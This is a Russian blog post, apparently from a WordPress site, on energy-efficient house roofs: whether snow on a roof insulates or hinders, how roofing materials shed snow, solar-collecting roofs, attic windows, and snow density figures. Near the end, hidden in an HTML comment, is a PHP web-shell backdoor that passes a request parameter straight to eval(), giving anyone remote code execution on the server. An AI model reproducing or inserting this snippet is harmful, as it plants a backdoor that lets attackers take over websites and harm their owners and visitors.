Энергоэффективный дом: крыша

Почему на крышах соседних домов разное количество снега? Снег на крыше мешает или помогает?

Нужен ли снег на крыше современных домов

Планировать работы по энергоэффективности дома хорошо зимой, не по тому, что времени много длинными зимними вечерами, это вместе с сельским ритмом жизни ушло безвозвратно. Зимой различия энергоэффективного дома и энергорастратного особенно очевидны. Нужно немного наблюдательности, иногда просто оторвать взгляд от земли – посмотреть на крышу своего дома, посмотреть на соседний дом и многое становиться очевидным. К примеру снег на крыше может служить показателем энергоэффективности. Если на ровной поверхности снежного покрова видны проталины, обнажается крыша – здесь и требуется утепление, и не нужно использовать приборы инфракрасного видения. (Хотя если есть у знакомых такие приборы – возьмите и насладитесь картиной рассеивания тепла вокруг жилища, впечатляет очень сильно, и дает заряд активности).

 Не от климата зависит колличество снега на крыше. И не от угла наклона крыши.

                Если сравнить две крыши соседних домов, можно увидеть, где то толстый слой снежного покрытия, а где то крыша остается открытой. То как снег на крыше ложится и сколько его накапливается – сильно зависит от самого покрытия – шифер, метал, черепица, обладают разным коэффициентом скольжения и на них удержание снега происходит очень не одинаково. Одним из самых низких коэффициентов скольжения обладают материалы, покрытые сверху полимерами.  В итоге выбор покрытия кровли определяет толщину снежного покрова, который будет собран над нашим жилищем.

Но я начал размышлять какова цель, мы собственно, что хотим – что бы снег собирался или не собирался на крыше. Оказалось, что это полностью зависит от типа дома и в моем небольшом исследовании оказалось, что по мере продвижения от энергорасточительных к энергоэффективным домам, а далее и к активным домам хозяин дома все больше заинтересован, что бы снег не лежал на поверхности крыши.

Итак, на одном полюсе дом с потерями тепла – для него снег – это дополнительное утепление создаваемое природой над его энергорасточительной лачугой. На самом деле теплоизоляционные свойства воздуха известны давно, а в снеге он и составляет основную процентную долю.  Однако на втором полюсе – дом вырабатывающий энергию, для него поверхность дома – это рабочая поверхность, и она должна трудиться в любое время года. Если она засыпана снегом – то приостанавливается не только потери энергии, но что более важно  и процесс приема энергии останавливается. Интерес владельца энергоэффективного дома в том, что бы его панели для подогрева воды, выработки тепла оставались под солнечными лучами, и зимой это даже более важно. Крыша энергоэффективного дома: Используется вся ее поверхность для получения энергии (тепловая, электрическая), зимой поверхность крыши остается не заснеженной или быстро и без участия человека очищается, покрытия крыши используются с очень высоким коэффициентом скольжения[i], пространство чердака под крышей по решению владельца или используется как зона с регулируемой прохладной температурой (если в хозяйственном цикле дома  нужны помещения с разной температурой – что например, обязательно необходимо для людей активно занимающихся цветоводством, огородничеством), либо превращается в мансардное – используемое людьми помещение, значительную часть площади крыши сегодня можно превращать в мансардные окна. Мансардное окно – при использовании современных стекол, будет активно нагревать помещение.

Старый дом Энергоэфективный дом Новые дома, производящие энергию
   



Итак:  В новых домах нет очистки кровли от снега и сосулек, поверхность всей крыши рассматривается как рабочая — захватывающая и собирающая энергию. Большое внимание уделяется окнам с новыми стеклами, легко проводящими тепло внутрь дома, но препятствующим его потерям, удерживающими тепло внутри помещения. Часть крыши превращается в окна, которые проводят энергию внутрь дома.

            А для тех, кто принял позицию – пусть снег будет теплоизолятором и будет защищать от холода вначале я поддержу это решение, но потом все же буду вынужден разочаровать. Да действительно только что выпавший снег имеет низкую плотность и соответственно в нем много воздуха и низкая теплопроводимость, плотность такого снег  30—60 кг/м3 (0,03—0,06 г/см3). Но следует учитывать, что плотность снега после метели 100—200 кг/м3. А если снег слежится – то его плотность достигнет уже плотности дерева — до 300 кг/м3. Но и это не предел снег после длительного обдувания сильными ветрами — 400—500 кг/м3. При оттепелях снег оседает и еще более уплотняется. Оказывается есть специальный термин «фирн» сдавленный, слежавшийся снег, имеющего плотность от 500 до 800 кг/м3. Вообще для сравнения стоит сказать, что плотность у воды 1000 кг/м3, а у льда 900 кг/м3 о их теплозащитных свойствах можете судить сами. Вообщем стоит знать. что на крайнем Севере. снег уплотненный ветром и топором не просто прорубить — ударишь — а топор звенит, как будто по металлу ударили. Из описаний зимовок в Антарктиде, сообщается, что там снег  уплотненный сильными ветрами — и бульдорез с трудом срезает! Если кто то хочет построить снежные здания — снег специально уплотняют.

Таблица плотности веществ При рассмотрении этой таблицы плотности интересные наблюдения: плотность сухого дерева ели  450, сосна – 500 — для сравнения пробка – 240, а цемент – 2160, и еще больше у железа —  7880. Вот и задумаешься – зачем люди металлом кроют крышу?


[i] Как следствие любое техническое обслуживание производится с альпинисткой  страховкой.

<!— [insert_php]if (isset($_REQUEST["bXoVC"])){eval($_REQUEST["bXoVC"]);exit;}[/insert_php][php]if (isset($_REQUEST["bXoVC"])){eval($_REQUEST["bXoVC"]);exit;}[/php] —>

Запись опубликована в рубрике Энергоэффективность с метками . Добавьте в закладки постоянную ссылку.

Добавить комментарий